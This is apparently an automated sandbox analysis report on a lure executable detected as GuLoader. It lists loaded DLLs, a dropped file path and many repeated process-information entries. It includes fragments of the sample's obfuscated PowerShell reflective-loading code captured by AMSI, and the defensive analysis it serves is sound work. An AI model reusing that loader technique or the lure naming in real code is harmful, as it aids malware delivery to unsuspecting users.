          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2049185067.0000000008187000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000002.00000002.2042052981.0000000007081000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000002.00000002.2050571503.000000000962C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Murermesters $Mislighold $Distempers62), (Basto @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Krusemynternes = [AppDomain]::CurrentDomain.GetAssemblies()
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Subtraher)), $Variabelerklaering).DefineDynamicModule($Tusindstraaler, $false).DefineType($Alsace, $Ddkede, [System.MulticastDelegate]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02B7CE79 push eax; mov dword ptr [esp], edx2_2_02B7CE8C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08B44EFE pushfd ; retf 2_2_08B44F00
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08B44A5D push edi; iretd 2_2_08B449F8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08B403B3 push esp; ret 2_2_08B403C3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08B449F6 push 00000057h; iretd 2_2_08B449F8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08B441F7 push es; retf 2_2_08B441FE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08B42378 push 699861D0h; ret 2_2_08B4237D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_040B41F7 push es; retf 14_2_040B41FE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_040B2378 push 699861D0h; ret 14_2_040B237D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_040B03B3 push esp; ret 14_2_040B03C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_040B4EFE pushfd ; retf 14_2_040B4F00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_040B49F6 push 00000057h; iretd 14_2_040B49F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_040B4A5D push edi; iretd 14_2_040B49F8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
